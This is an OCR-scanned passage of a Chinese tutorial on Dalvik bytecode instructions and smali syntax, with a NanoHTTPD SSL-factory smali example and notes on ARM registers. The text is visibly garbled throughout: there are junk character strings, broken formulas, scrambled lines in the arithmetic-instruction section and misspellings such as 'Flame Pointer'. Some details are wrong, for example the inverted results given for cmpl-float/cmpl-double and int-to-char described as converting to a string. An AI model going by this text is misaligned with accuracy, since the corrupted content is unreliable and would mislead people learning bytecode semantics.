e instance-of/jumbo vAAAA,vBBBB,type@CCCCCCCC 指令 功能 与 instance-of 
VvAvB,type@CCCC" 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 范围 更 大 (Android4.0 
中 新 增 的 指令 ) 

e new-instance/jumbo vAAAA,type@BBBBBBBB 指令 功能 与 new-instance 
vAA,type@BBBB 相同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 范围 更 大 (Android4.0 中 新 
增 的 指令 ) . 


0x047. 数 组 操作 指令 


数组 操作 包括 读 取 数 组 长 度 、 新 建 数组 、 数 组 赋值 、 数 组 元 素 取 值 与 赋值 等 操作 。 
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e array-length vA,vB 获取 给 定 vB 寄 存 器 中 数组 的 长 度 并 将 值 赋 给 VA 寄存 器 ， 数 组 长 
度 指 的 是 数组 的 条 目 个 数 。 

e new-array vA,vB,type@CCCC 构造 指定 类 型 (type@CCCC) 与 大 小 (vB) 的 数 
组 ， 并 将 值 赋 给 VA 寄存 器 。 

e new-array/jumbo vAAAA,VvBBBB,type@CCCCCCCC 指令 功能 与 上 一 条 指令 相同 ， 
只 是 寄存 器 与 指令 的 索引 取 值 范围 更 大 (Android4.0 中 新 增 的 指令 ) 

e filled-new-array {vC,vD,vE,vF,vG},type@BBBB 构造 指定 类 型 (type@BBBB) 与 大 
小 (vA) 的 数组 并 填充 数组 内 容 。VA 寄 存 器 是 隐 含 使 用 的 ， 除 了 指定 数组 的 大 小 外 
还 制订 了 参数 的 个 数 ，VvC~VvG 是 使 用 到 的 参数 寄存 器 序列 

e filled-new-array/range {vCCCC, ... ,vNNNN},type@BBBB 指定 功能 与 上 一 条 指令 相 
同 ， 只 是 参数 寄存 器 使 用 range 字 节 码 后 组 指定 了 取 值 范围 ，vC 是 第 一 个 参数 寄存 
& ^ N=A+tC-1 ° 

e filled-new-array/jumbo {vCCCC, ... ,vNNNN},type@BBBBBBBB 指令 功能 与 上 一 条 

间 令 相同 ， 只 是 寄存 器 与 指令 的 索引 取 值 范围 更 大 《Android4.0 中 新 增 的 指令 ) fill- 
array-data vAA, +BBBBBBBB 用 指定 的 数据 来 填充 数组 ，VAA 寄 存 器 为 数组 引用 ， 
引用 必须 为 基础 类 型 的 数组 ， 在 指令 后 面 会 紧 跟 一 个 数据 表 

e arrayop VAA,VBB,vCC 对 vBB 寄 存 器 指定 的 数组 元 素 进入 取 值 与 赋值 。vCC 寄 存 器 
指定 数组 元 素 索引 ，VAA 寄 存 器 用 来 寄 放 读 取 的 或 需要 设置 的 数组 元 素 的 值 。 读 取 
元 素 使 用 aget 类 指令 ， 元 素 赋值 使 用 aput 指 令 ， 根 据 数组 中 存储 的 类 型 指令 后 面 会 
紧 跟 不 同 的 指令 后 级， 指令 列表 有 aget、aget-wide、aget-object、aget-boolean、 
aget-byte ` aget-char ` aget-short ` aput ` aput-wide ` aput-boolean ` aput-byte ` 
aput-char ` aput-short ° 


0Xx048. 异 第 指令 
Dalvik 指 令 集 有 一 条 指令 用 来 抛 出 异常 


e throw vAA 抛 出 VAA 寄 存 器 中 指定 类 型 的 异常 。 


0x049. 跳 转 指令 
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e 跳 转 指令 用 于 从 当前 地 址 跳 转 到 偏 移 处 。Dalvik 指 令 集中 有 三 种 跳 转 指 令 : 无 条 件 跳 
转 (goto) 、 分 支 跳 转 (switch) 与 条 件 跳 转 (if) ° 

e goto +AA 无 条 件 跳 转 到 指定 偏 移 处 ， 偏 移 量 AA 不 能 为 0 

e goto/16 +AAAA 无 条 件 跳 转 到 指定 偏 移 处 ， 偏 移 量 AAAA 不 能 为 0。 

e goto/32 +AAAAAAAA 无 条 件 跳 转 到 指定 偏 移 处 。 

e packed-switch vAA,+BBBBBBBB 分 支 跳 转 指令 。VAA 寄 存 器 为 Switch 分支 中 需要 判 
断 的 值 ，BBBBBBBB 指 向 一 个 packed-switch-payload 格 式 的 偏 移 表 ， 表 中 的 值 是 有 
规律 递增 的 。 Dalvik 中 计算 偏 移 是 以 两 个 字 节 为 单位 的 ， 故 偏 移 表 的 地 址 是 当前 指 
令 的 地 址 + 2*BBBBBBBB 

e sparse-switch vAA,+BBBBBBBB 分 支 跳 转 指令 。VAA 寄 存 器 为 switch 分 支 中 需要 判 
断 的 值 ，BBBBBBBB 指 向 一 个 sparse-switch-payload 格 式 的 偏 移 表 ， 表 中 的 值 是 无 
规律 的 偏 移 表 ， 表 中 的 值 是 无 规律 的 偏 移 量 。 

e if-test vA,vB,+CCCC 条 件 跳 转 指令 。 比 较 VA 寄 存 器 与 VB 寄存 器 的 值 ， 如 果 比 较 结果 
满足 就 跳 转 到 CCCC 指 定 的 偏 移 处 。 偏 移 量 CCCC 不 能 为 0。if-test 类 型 的 指令 有 以 下 
JU& : >> if-eq 如 果 VvA 等 于 vB 则 跳 转 。Java 语 法 表示 为 jf(vA == vB) > > if-ne 如 果 
VA 不 等 于 vB 则 跳 转 。Java 语 法 表示 为 f(vAI= vB) > > 太 引 如 果 VvA 小 于 vB 则 跳 转 。 
Java 语 法 表示 为 if(vA < vB) > > if-le 如 果 VA 人 小 于 等 于 vB 则 跳 转 。Java 语 法 表示 为 
if(vA <= vB) > if-gt 如 果 vA 大 于 vB 则 跳 转 。Java 语 法 表示 为 jf(vA > vB) > if-ge 如 
果 vA 大 于 等 于 vB 则 跳 转 。Java 语 法 表示 为 if(vA >= vB) 

e. if-testz VAA,+BBBB 条 件 跳 转 指令 。 拿 VAA 寄 存 器 与 0 比较 ， 如 果 比 较 结果 满足 或 值 
为 0 时 就 跳 转 到 BBBB 指 定 的 偏 移 处 。 偏 移 量 BBBB 不 能 为 0。 if-testz 类 型 的 指令 有 一 
FILA : >> jf-eqz 如 果 VAA 为 0 则 跳 转 。Java 语 法 表示 为 jf(vAA == 0) > > if-nez 
如 果 VAA 不 为 0 则 跳 转 。 Java 语 法 表示 为 ftvAAI= 0) > > if-Itz 如 果 VAA 小 于 0 Wl sk 
$ o Java ik X If(vAA < 0) > > if-lez 如 果 vAA 小 于 等 于 0 则 跳 转 。 Java 语 法 表 
示 为 if(vAA <= 0) > > if-gtz 如 果 vAA 大 于 0 则 跳 转 。 Java 语 法 表示 为 jf(vAA > 0) > > 
if-gez 如 果 vAA 大 于 等 于 0 则 跳 转 。 Java 语 法 表示 为 if(vAA >= 0) 


0x0410. 比 较 指 令 
比较 指令 用 于 两 个 寄存 器 的 值 ( 浮 点 型 或 长 整 型 ) 进行 比较 。 它 的 格式 为 cmpkind 


vVAA,vBB,vCC， 其 中 vBB 寄 存 器 与 VCC 寄 存 器 是 需要 比较 的 两 个 寄存 器 或 者 两 个 寄存 器 对 ， 
比较 的 结果 放 到 VAA 寄 存 器 。Dalvik 指 令 集 中 共有 5 条 比较 指令 。 
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e cmpl-float 比较 两 个 单 精 度 浮 点 数 。 如 果 VBB 寄 存 器 小 于 VCC 寄 存 器 ， 则 结果 为 1， 
相等 则 结果 为 0， 大 于 的 话 结果 为 -1。 

e cmpg-float 比较 两 个 单 精度 浮 点 数 。 如 果 vBB 寄 存 器 大 于 vCC 寄 存 器 ， 则 结果 为 1， 
相等 则 结果 为 0， 小 于 的 话 结果 为 -1。 

e cmpl-double 比较 两 个 双 精 度 浮 点 数 。 如 果 vBB 寄 存 器 小 于 vCC 寄 存 器 ， 则 结果 为 
1， 相 等 则 结果 为 0， 大 于 的 话 结果 为 -1。 

e cmpg-double 比较 两 个 双 精 度 浮 点 数 。 如 果 vBB 寄 存 器 大 于 vCC 寄 存 器 ， 则 结果 为 
1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 -1。 

e cmp-long 比较 两 个 长 整 型 数 。 如 果 vBB 寄 存 器 大 于 vCC 寄 存 器 ， 则 结果 为 1， 相 等 则 
结果 为 0， 小 于 的 话 结果 为 -1。 


0x0411. 字 段 操作 指令 


e 字段 操作 指令 用 来 对 对 象 实例 的 字段 进入 读 写 操作 。 字 段 的 类 型 那个 可 以 是 Java 中 
有 效 的 数据 类 型 ， 对 普通 字段 与 静态 字段 操作 有 两 种 指令 集 ， 分别 是 iinstanceop 
VA,VB,field@CCCC 与 sstaticop vAA,field@BBBB 

o 普通 字段 指令 的 指令 前 缓 为 j， 如 对 普通 字段 读 操作 使 用 jget 指 令 ， 写 操作 使 用 iput 指 
令 ; 静态 字段 的 指令 前 级 为 s， 如 对 静态 字段 读 操 作 使 用 sget 指 令 ， 写 操作 使 用 sput 


指令 。 

e 根据 访问 的 字段 类 型 不 同 ， 字段 操作 指令 后 面 会 紧 跟 字段 类 型 的 后 级 ， 如 iget-byte 
间 令 表示 读 写 实例 字段 的 值 类 型 为 字 节 类 型 ，iput-short 指 令 表示 设置 实例 字段 的 值 
类 型 为 短 整 型 。 两 类 指令 操作 结果 都 是 一 样 的 ， 只 是 指令 前 级 与 操作 的 字段 类 型 不 
同 。 


e 普通 字段 操作 指令 有 : iget ^ iget-wide ` iget-object ` iget-boolean ` iget-byte ` iget- 
char ` iget- short ` iput ^ iput-wide ` iput-object ` iput-boolean ^ iput-byte ^ iput- 
char ` iput-short ° 

e 静态 字段 操作 指令 有 : sget^ sget-wide ` sget-object ` sget-boolean ^ sget-byte ` 
sget-char ` sget- short ` sput ^ sput-wide ` sput-object ` sput-boolean ^ sput- 
byte ` sput-char ` sput- short ° 

e 在 Android4.0 系 统 中 ，Dalvik 指 令 集中 增加 了 instanceop/jumbo 
VAAAA,VBBBB, field@CCCCCCCC 与 sstaticop/jumbo vAAAA, field@BBBBBBBB 
两 类 指令 ， 它 们 与 上 面 介绍 的 两 类 指令 作用 相同 ， 只 是 在 指令 中 增加 了 jumbo 字 节 码 
后 级 ， 且 寄存 器 值 与 指令 的 索引 取 值 范围 更 大 。 


0x0412. 方 法 调用 指令 


方法 调用 指令 负责 调用 类 实例 的 方法 。 它 的 基础 指令 为 invoke， 方 法 常用 指令 有 invoke-kind 
{vC,vD,vE,vF,vG},meth@BBBB 与 invoke-kind/range {vCCCC, ... ,VNNNN},meth@BBBB 两 
类 ， 两 类 指令 在 作用 上 并 无 不 同 ， 只 是 后 则 在 设置 参数 寄存 器 时 使 用 了 range 来 指定 寄存 器 的 
范围 。 根 据 方法 类 型 的 不 同 ， 共 有 如 下 5 条 方法 调用 指令 : 
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e invoke-virtual 或 invoke-virtual/range 调用 实例 的 虚 方法 

e invoke-super 或 invoke-super/range 调用 实例 的 父 类 方法 

e invoke-direct 或 invoke-direct/range 调用 实例 的 直接 方法 

e invoke-static 或 invoke-static/range 调用 实例 的 静态 方法 

e invoke-interface 或 invoke-interface/range 调用 实例 的 接口 方法 


在 Android4.0 系 统 中 ，Dalvik 指 令 集中 增加 了 invoke-kind/jumbo {vCCCC, . 
,VNNNN},meth@BBBBBBBB 这 类 指令 ， 它 与 上 面 介绍 的 两 类 指令 作用 相 A ， 只 是 在 指令 中 
增加 了 jumbo 字 节 码 后 级 ， 且 寄存 器 值 与 指令 的 索引 取 值 范围 更 大 。 

方法 调用 的 指令 的 返回 值 必须 使 用 move-resultr-> * 指令 来 获取 。 如 下 两 条 指令 


e invoke-static {},_Landroid/os/Parcel;->obtain()Landroid/osParcel; 
e move-result-object vO 


0x0413. 数 据 转 换 指 令 


数据 转换 指令 用 于 将 一 种 类 型 的 数值 转换 成 另 一 种 类 型 ， 它 的 格式 为 unop vA,vB 。 vB 寄存 
器 或 vB 寄存 器 对 存放 需要 转换 的 数据 ， 转 换 后 的 结果 保存 在 VA 寄存 器 或 vA 寄存 器 对 中 。 


e neg-int 对 整 型 数 求 补 

e not-int 对 整 型 数 求 反 

e neg-long 对 长 整 型 求 补 

e not-long 对 长 整 型 求 反 

e neg-float 对 单 精度 浮 点 型 数 求 补 

e neg-double 对 双 精 度 浮 点 型 数 求 补 

e int-to-long 将 整 型 数 转换 为 长 整 型 

e int-to-float 将 整 型 数 转换 为 单 精度 浮 点 型 
e int-to-double 将 整 型 数 转换 为 双 精 度 浮 点 型 
« long-to-int 将 长 整 型 数 转换 为 整 型 

e long-to-float 将 长 整 型 数 转 换 为 单 精 度 浮 点 型 

e long-to-double 将 长 整 型 数 转换 为 双 精 度 浮 点 型 
e float-to-int 将 单 精度 浮 点 型 数 转换 为 整 型 

e float-to-long 将 单 精 EA 点 型 数 转换 为 长 整 弄 

。 float-to-double 将 单 精度 浮 点 型 数 转换 为 双 精 度 浮 点 型 
e double-to-int 将 双 精 度 浮 点 型 数 转换 为 整 型 

e double-to-long 将 双 精 度 浮 点 型 数 转换 为 长 整 型 

e double-to-float 将 双 精 度 浮 点 型 数 转换 为 单 精度 浮 点 型 
e int-to-byte 将 整 型 转换 为 字 节 型 

e int-to-char 将 整 型 转换 为 字符 串 

e int-to-short 将 整 型 转换 为 短 整 型 


ER 


党 


0x0414. 数 据 运 萌 指 令 
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主要 进行 数值 间 如 加 、 减 、 


FR RE BL ET MMB HERMIT AAA» ALS 3E S ARH o HUE HA 


令 有 如 下 四 类 (数据 运算 时 可 能 在 寄存 器 或 寄存 器 对 间 进 行 ， 下 面 的 指 


存 器 来 描述 ) 





e binop vAA,vBB,vCC 将 vBB 寄 存 器 
e binop/2addr vA,vB 将 vA 寄存 器 与 vB 寄存 器 进行 
e binop/lit16 vA,vB,#+CCCC 将 vB 寄存 器 与 常量 CCCC 进 行 运算 ， 


Za 


aa 


运算 ， 结 果 保 存 到 VA 寄存 器 


e binop/lit8 vAA,vBB,#+CC 将 vBB 寄 存 器 与 常量 CC 进行 运算 ， 


与 VCC 寄 存 器 进行 运算 ， 结 果 保 存 到 VAA 寄 存 器 
it 


令 作用 讲解 时 使 用 寄 


结果 保存 到 VA 寄存 


结果 保存 到 VAA 寄 存 器 


后 面 3 类 指令 比 第 1 类 指令 分 别 多 了 addr、lit16、lit8 等 指令 后 级 。 四 类 指令 中 基础 字 节 码 后 面 
加 上 数据 类 型 后 级 ， 如 -int 或 -long 分 别 表 示 操 作 的 数据 类 型 那个 为 整 型 与 长 整 型 。 第 1 类 指令 
可 归 类 如 下 : 


与 VCC 寄 存 器 (vBB + vCC) 
与 VCC 寄存 器 o (vBB - vCC) 
与 VCC 寄 存 器 值 进行 乘法 运算 (VBB > * vCC) 
与 VCC 寄 存 器 (vBB / vCC) 
与 VCC 寄 存 器 值 进 和 算 (VBB % vCC) 
与 VCC 寄 存 器 值 进 行 与 运算 (vBB & vCC ) 

e xor-type VBB 寄 存 器 与 VCC 寄 存 器 值 进 行 异 或 运算 (VBB ^ vCC) 
e shl-type vBB 寄 存 器 (有 符号 数 ) 左 移 yVCC 位 (vBB « vCC) 

e shr-type vBB 寄 存 器 (有 符号 数 ) 右 移 vVCC 位 (vBB » vCC) 
器 des (vBB » vCC ) 


e add-type vBB 3 44 
e sub-type vBB 4 4$ #& 





。 mul-type vBB3 4$ & 
e div-type vBB3 5S 
e rem-type vBB3 4$ Z 
e and-type vBB 3T 44 


e ushr-type vBB 4 % 2 


e or-type vBB 寄存 器 与 VCC 寄 存 器 值 进行 或 运算 (vBB | vCC ) 

其 中 基础 字 节 码 后 面 的 -type 可 以 是 -int、-long、-float、-double。 后 面 3 类 指令 与 之 类 似 。 
至 此 Dalvik 虚 拟 机 支持 的 所 有 指令 都 介绍 完了 。 在 Android4.0 系 统 以 前 ， 每 个 指令 的 字 节 码 只 
在 用 一 个 字 节 ， 取 值 范围 是 0x0~-0x0ff， 在 Android4.0 系 统 中 ， 有 扩充 了 一 部 分 指令 ， 这 些 指 
令 被 成 为 扩展 指令 ， 如 果 指 令 后 添加 了 jumbo 后 级 ， 增 加 了 寄存 器 与 常量 的 取 值 范围 。 
0x05. 类 与 包 
0x051. 类 与 继承 与 包 
一 般 的 smali 文 件 都 遵循 了 一 套 语 法 规范 .在 smali 文 件 的 头 3 行 描述 了 当前 类 的 一 些 信息 .格式 如 


下 


.class < 访问 权限 > 
,SUper < 包 名 /类 名 > 
.source "< 原 java 类 名 >" 


[ 修 鲜 关键 字 ] < 包 名 /类 名 > 


比如 


.class public Lnet/smalinuxer/sdktest/MainActivity; 
.super Landroid/app/Activity; 
.source "MainActivity.java" 


注 :.Source 可 能 为 空 


0x052. 接 口 


如 果 一 个 类 实现 了 一 个 接口 将 会 以 # interfaces 开 头 
.implements < 接口 名 > 


例如 : 


# interfaces 
.implements Ljava/lang/Thread 


0x053. 注 解 与 泛 型 


.annotation [注解 属性 ] < 注解 类 名 > 
[注解 字段 = 值 ] 
.end annotation 


.field private infos:Ljava/util/Map; 
.annotation system Ldalvik/annotation/Signature; 
value = { 
"Ljava/util/Map", 
Ves 
"Ljava/lang/String;", 
"Ljava/lang/String;", 
Nov " 
} 
.end annotation 
.end field 


原 : private Map<String, String> infos = new HashMap<String, String>(); 


# instance fields 
.field public sayWhat:Ljava/lang/String; 
.annotation runtime Lcom/droider/anno/MyAnnoField; 
info = "Hello World" 
.end annotation 
.end field 


FR: @com.droider.anno.MyAnnoField(info = "Hello World") 


0x054. A 8 & 


这 里 表示 泛 型 


内 部 类 将 会 成 为 另外 一 个 smali 文 件 文件 格式 : [外 部 类 ]$[ 内 部 类 ].smali 例 
如 :Manifest$permission.smali 
在 small 中 ,内 部 类 会 自动 保存 外 部 类 的 引用 ,引用 层 数 向 下 则 指针 标识 加 一 


0x06. 属 性 


0x061. 静 态 属性 
一 般 的 静态 属性 以 #static fields 开 头 ,# 为 注释 进行 标注 有 如 下 格式 : 


.field < 访问 权限 > static [修饰 关键 字 ] < 字段 名 > ;< 字段 类 型 > 例如 : 
.field private static final CONTENT_DISPOSITION_ATTRIBUTE_PATTERN:Ljava/util/regex/Pattern 


0x062. 实 体 属 性 


一 般 的 静态 属性 以 #instance fields 开 头 有 如 下 格式 : 


.field < 访问 权限 > [修饰 关键 字 ] < 字段 名 >:< 字 段 类 型 > 


例如 : 
.field protected asyncRunner:Lnet/smalinuxer/mopp/httpd/NanoHTTPD$AsyncRunner ; 


0x07. 方 法 


0x071. 直 接 方 法 
一 般 的 静态 属性 以 #direct methods 开 头 Ate FHA: 


,method < 访问 权限 >[ 修 饰 关键 字 ]< 方 法 原型 > 


«.locals» # 指定 了 使 用 的 局 部 变量 个 数 

[.parameter] # X 定 了 方法 的 参数 ， 如 果 有 三 个 参数 就 有 三 个 , parameter 
[.prologue] # 指定 了 代码 开始 段 ,混淆 过 的 代码 可 能 去 掉 了 该 段落 
[.line] m 定 了 该 处 指令 邻 在 源 代码 中 的 行 数 ,混淆 过 的 代码 可 能 会 去 挤 
< 代码 体 > 


.end method 


例如 : 


.method public static makeSSLSocketFactory(Ljava/lang/String; [C)Ljavax/net/ssl/SSLServ 


erSocketFactory; 
.locals 10 
.param pO, "keyAndTrustStoreClasspathPath" 4 Ljava/lang/String; 
.param p1, "passphrase" # [C 
.annotation system Ldalvik/annotation/Throws; 
value - 


Ljava/io/IOException; 
.end annotation 


.prologue 
.line 1566 


const/4 v5, 0x0 


.line 1568 

.local v5, "res":Ljavax/net/ssl/SSLServerSocketFactory; 

:try start O 

invoke-static (3j, Ljava/security/KeyStore; -»getDefaultType()Ljava/lang/String; 


move-result-object v7 


invoke-static (v7), Ljava/security/KeyStore; ->getInstance(Ljava/lang/String; )Ljava/sec 
urity/KeyStore; 


move-result-object v3 


.line 1569 
.local v3, "keystore":Ljava/security/KeyStore; 
const-class v7, Lnet/smalinuxer/mopp/httpd/NanoHTTPD; 


invoke-virtual (v7, p0}, Ljava/lang/Class; ->getResourceAsStream(Ljava/lang/String; )Lja 
va/io/InputStream; 


move-result-object v4 


.line 1570 
.local v4, "keystoreStream":Ljava/io/InputStream; 
invoke-virtual (v3, v4, pi}, Ljava/security/KeyStore; ->load(Ljava/io/InputStream; [C)V 


.line 1571 
invoke-static (3j, Ljavax/net/ssl/TrustManagerFactory; -»getDefaultAlgorithm()Ljava/lang 
/String; 


move-result-object v7 


invoke-static (v7), Ljavax/net/ssl/TrustManagerFactory; ->getInstance(Ljava/lang/String 
; )Ljavax/net/ssl/TrustManagerFactory; 


move-result-object v6 


.line 1572 

.local v6, "trustManagerFactory":Ljavax/net/ssl/TrustManagerFactory; 

invoke-virtual (v6, v3}, Ljavax/net/ssl/TrustManagerFactory; ->init(Ljava/security/KeyS 
tore; )V 


.line 1573 
invoke-static {}, Ljavax/net/ssl/KeyManagerFactory; -»getDefaultAlgorithm()Ljava/lang/S 
tring; 


move-result-object v7 


invoke-static (v7), Ljavax/net/ssl/KeyManagerFactory; -»getInstance(Ljava/lang/String;) 
Ljavax/net/ssl/KeyManagerFactory; 


move-result-object v2 


.line 1574 

.local v2, "keyManagerFactory":Ljavax/net/ssl/KeyManagerFactory; 

invoke-virtual (v2, v3, p1}, Ljavax/net/ssl/KeyManagerFactory; ->init(Ljava/security/Ke 
yStore;[C)V 


.line 1575 
const-string v7, "TLS" 


invoke-static (v7), Ljavax/net/ssl/SSLContext; ->getInstance(Ljava/lang/String; )Ljavax/ 
net/ssl/SSLContext; 


move-result-object vO 


.line 1576 

.local vO, "ctx":Ljavax/net/ssl/SSLContext; 

invoke-virtual {v2}, Ljavax/net/ssl/KeyManagerFactory; ->getKeyManagers()[Ljavax/net/ss 
1/KeyManager; 


move-result-object v7 


invoke-virtual {v6}, Ljavax/net/ssl/TrustManagerFactory; ->getTrustManagers()[Ljavax/ne 


t/ssl/TrustManager; 
move-result-object v8 


const/4 v9, 0x0 


invoke-virtual {v0, v7, v8, v9}, Ljavax/net/ssl/SSLContext; ->init([Ljavax/net/ssl/KeyM 


anager; [Ljavax/net/ssl/TrustManager ; 


Ljava/security/ 


SecureRandom; )V 


.line 1577 


invoke-virtual {v0}, Ljavax/net/ssl/SSLContext; ->getServerSocketFactory()Ljavax/net/ss 


1/SSLServerSocketFactory; 
:try end O 
.catch Ljava/lang/Exception; [:try start 0 .. :try end 0) :catch O 


move-result-object v5 


.line 1581 
return-object v5 


.line 1578 

.end local vO 
.end local v2 
.end local v3 
.end local v4 
.end local v6 
:catch O0 
move-exception vi 


"ctx" :Ljavax/net/ssl/SSLContext; 
"keyManagerFactory":Ljavax/net/ssl/KeyManagerFactory; 
"keystore":Ljava/security/KeyStore; 
"keystoreStream":Ljava/io/InputStream; 
"trustManagerFactory":Ljavax/net/ssl/TrustManagerFactory; 


Yk dk dk db d 


.line 1579 

.local vi, "e":Ljava/lang/Exception; 

new-instance v7, Ljava/io/IOException; 

invoke-virtual {v1}, Ljava/lang/Exception; ->getMessage()Ljava/lang/String; 
move-result-object v8 


invoke-direct (v7, v8}, Ljava/io/IOException; -><init>(Ljava/lang/String; )V 


throw v7 
.end method 


0x08. i= fF 


0x081. 内 部 类 注解 


当 产 生 一 个 内 部 类 一 定 会 存在 EnclosingMethod 的 注解 ,这 个 注解 是 用 来 标注 内 部 类 范围 ,还 有 


一 个 InnerClass 的 注解 ,表明 该 类 是 内 部 类 , 例 : 


# annotations 

annotation system Ldalvik/annotation/EnclosingMethod; 

value = Lcom/example/atest/MainActivity; ->onCreate(Landroid/os/Bundle; )V 
,end annotation 


.annotation system Ldalvik/annotation/InnerClass; 
accessFlags = 0x0 

name = null 

.end annotation 


标注 了 内 部 类 范围 为 oncreate 


0x082. 其 他 注解 


没什么 用 处 


0x09.R 文 件 


RR 为 自动 生成 的 文件 ,包括 了 
R.smali,R$attr.smali,R$dimen.smali,R$drawable.smali,R$id.smali, R$layout.smali,R$menu.s 
mali,R$string.smali,R$style.smali 其 中 还 有 BuildConfig.smali, 这 个 也 是 自动 生成 的 文件 。 


ARM ZMD 


ARM 处 理 器 共有 37 个 寄存 器 。 其 中 包括 : 31 个 通用 寄存 器 ， 包 括 程 序 计数 器 (PC) 在 内 ， 这 些 
寄存 器 都 是 32 位 寄存 器 ; 以 及 6 个 32 位 状态 寄存 器 ， 但 目前 只 使 用 了 其 中 12 位 。ARM 处 理 器 
共有 7 种 不 同 的 处 理 器 模式 ， 在 每 一 种 处 理 器 模式 中 有 一 组 相应 的 寄存 器 组 。 任 意 时 刻 (也 就 是 
任意 的 处 理 器 模式 下 )， 可 见 的 寄存 器 包括 15 个 通用 寄存 器 (RO~-R14)、 一 个 或 两 个 状态 寄存 
器 及 程序 计数 器 (PC)。 在 所 有 的 寄存 器 中 ， 有 些 是 各 模式 共用 的 同一 个 物理 寄存 器 ， 有 一 些 
寄存 器 是 各 模式 自己 拥有 的 独立 的 物理 寄存 器 。 

下 表 列 出 了 各 处 理 器 模式 下 可 见 的 寄存 器 情况 ， 寄 存 器 详细 可 参考 AAPCS 85.1.1 Core 
registers ° 


User System Supervisor Abort Undefined IRQ FIQ 

RO RO RO RO RO RO RO 

R1 R1 R1 R1 R1 R1 R1 

R2 R2 R2 R2 R2 R2 R2 

R3 R3 R3 R3 R3 R3 R3 

R4 R4 R4 R4 R4 R4 R4 

R5 R5 R5 R5 R5 R5 R5 

R6 R6 R6 R6 R6 R6 R6 

R7 R7 R7 R7 R7 R7 R7 

R8 R8 R8 R8 R8 R8 R8_fiq 
R9 R9 R9 R9 R9 R9 R9_fiq 
R10 R10 R10 R10 R10 R10 R10_fiq 
R11 R11 R11 R11 R11 R11 R11_fiq 
R12 R12 R12 R12 R12 R12 R12_fiq 
R13 R13 R13 svc R13 abt R13 und R13 irq R13 fiq 
R14 R14 R14 svc R14 abt R14 und R14 irq R14 fiq 
PC PC PC PC PC PC PC 
CPSR | CPSR CPSR CPSR CPSR CPSR CPSR 


SPSR svc | SPSR abt | SPSR und | SPSR irq | SPSR fiq 


a. 未 备份 寄存 器 ， 包 括 RO-R7 


对 每 个 未 备份 寄存 器 来 说 ， 在 所 有 的 模式 下 都 是 指 同一 个 物理 寄存 器 (例如 : Usr 下 的 R0 与 FIQ 

下 的 RO 是 同一 个 寄存 器 )。 在 异常 程序 中 断 造成 模式 切换 时 ， 由 于 不 同 模式 使 用 的 是 相同 的 物 

理 寄存 器 ， 这 可 能 导致 数据 遭 到 破坏 。 未 备份 寄存 器 没有 被 系统 作为 别 的 用 途 ， 任 何 场 合 均 

可 采用 未 备份 寄存 器 © 

R7 对 应 于 x86 下 的 BP 寄存 器 ， 相 对 与 SP，R7 就 是 栈 底 ， 在 进入 新 一 个 栈 帧 之 后 先 把 原来 的 
R7 压 栈 ， 然 后 R7 保 存 当 前 BP。R7 大 部 分 情况 用 来 保存 系统 调用 号 (syscall number) 。 

RO-R3 用 于 传 参 数 ， 更 多 的 参数 须 通 过 栈 来 传递 ， 调 用 函数 的 时 候 ， 参 数 先 从 R0 依 次 传递 ; 

RO-R1 也 作为 结果 寄存 器 ， 保 存 函 数 返 回 结果 ， 被 调用 的 子 程序 在 返回 前 无 须 恢 复 这 些 寄存 
器 的 内 容 。 

R4-R6 没有 特殊 规定 ， 就 是 普通 的 通用 寄存 器 ， 作 为 被 调 保存 (callee-save) 寄存 器 ， 一 般 

保存 内 部 局 部 变量 (local variables) ° 

被 调 保存 寄存 器 (callee-save register) 是 指 ， 如 果 这 个 寄存 器 被 调用 /使 用 之 前 ， 需 要 被 保存 。 


b. 备份 寄存 器 ， 包 括 R8-R14 


对 于 备份 寄存 器 R8-R12 来 说 ， 除 FIQ 模 式 下 其 它 模式 均 使 用 相同 的 物理 寄存 器 。 在 FIQ 模 式 下 

R8_fiq > R9 fiq > R10_fiq’ R11_fiq’ R12 fiq， 它 有 自己 的 物理 寄存 器 。 对 于 R13 和 R14 寄 存 

器 每 种 模式 都 有 自己 的 物理 寄存 器 (System 与 Usr 的 寄存 器 相同 )， 当 异常 中 断 发 生 时 ， 系 统 使 
用 相应 模式 下 的 物理 寄存 器 ， 从 而 可 以 避免 数据 遭 到 破坏 。 

R8 > R10-R11 没有 特殊 规定 ， 就 是 普通 的 通用 寄存 器 

R9 是 操作 系统 保留 。 

R10 (SL) 被 调 保存 寄存 器 ，Stack Limit ° 

R11 (FP) 被 调 保存 寄存 器 ， 帧 指针 (Flame Pointer) 。 通 常 ARM 模式 下 r11 会 作为 帧 指 

针 ，THUMB 模式 下 r7 则 作为 帧 指针 ， 但 在 系统 有 可 能 根据 自己 的 需要 改变 这 个 约定 。 

R12 又 叫 IP(intra-procedure scratch )。 该 寄存 器 会 被 链接 器 当 作 擦 写 寄存 器 (scratch 

register) 在 过 程 (Procedure) 调用 之 间 使 用 。 可 擦 除 寄存 器 (Scratch registers) 是 指数 据 

寄存 器 RO, R1, R2 and R3。 一 个 过 程 (procedure) 在 返回 时 ， 不 能 修改 它 的 值 。 这 个 寄存 

器 不 会 被 Linux gcc 或 glibc 使 用 ， 但 是 另外 一 个 系统 可 能 会 。 


Register r12 (IP) may be used by a linker as a scratch register between a routine and 
any subroutine it calls (for details, see §5.3.1.1, Use of IP by the linker). It can also be 
used within a routine to hold intermediate values between subroutine calls 

Both the ARM- and Thumb-state BL instructions are unable to address the full 32-bit 
address space, so it may be necessary for the linker to insert a veneer between the 
calling routine and the called subroutine. Veneers may also be needed to support ARM- 
Thumb inter-working or dynamic linking. Any veneer inserted must preserve the 
contents of all registers except IP (r12) and the condition code flags; a conforming 
program must assume that a veneer that alters IP may be inserted at any branch 
instruction that is exposed to a relocation that supports inter-working or long branches. 
即 是 说 现在 如 果 汇 编 代 码 中 存在 bl 指令 ， 而 r12 又 被 用 来 作为 通用 寄存 器 ， 那 么 r12 的 值 就 
很 有 可 能 会 被 链接 器 插入 的 veneer 程 序 修改 掉 了 。 





R13 也 称 为 SP 堆栈 指针 (stack pointer， 用 于 存放 栈 顶 指针 ， 类 似 x86_64 中 的 RSP)。 

该 栈 是 一 块 用 来 存储 本 地 函数 的 内 存 区 域 。 当 函数 被 返回 时 ， 存 储 空间 会 被 回收 。 在 堆栈 上 

分 配 空间 , 需要 从 栈 寄存 器 (the stack register) 减 去 。 分 配 一 个 32 位 的 值 , 需要 从 堆栈 指针 
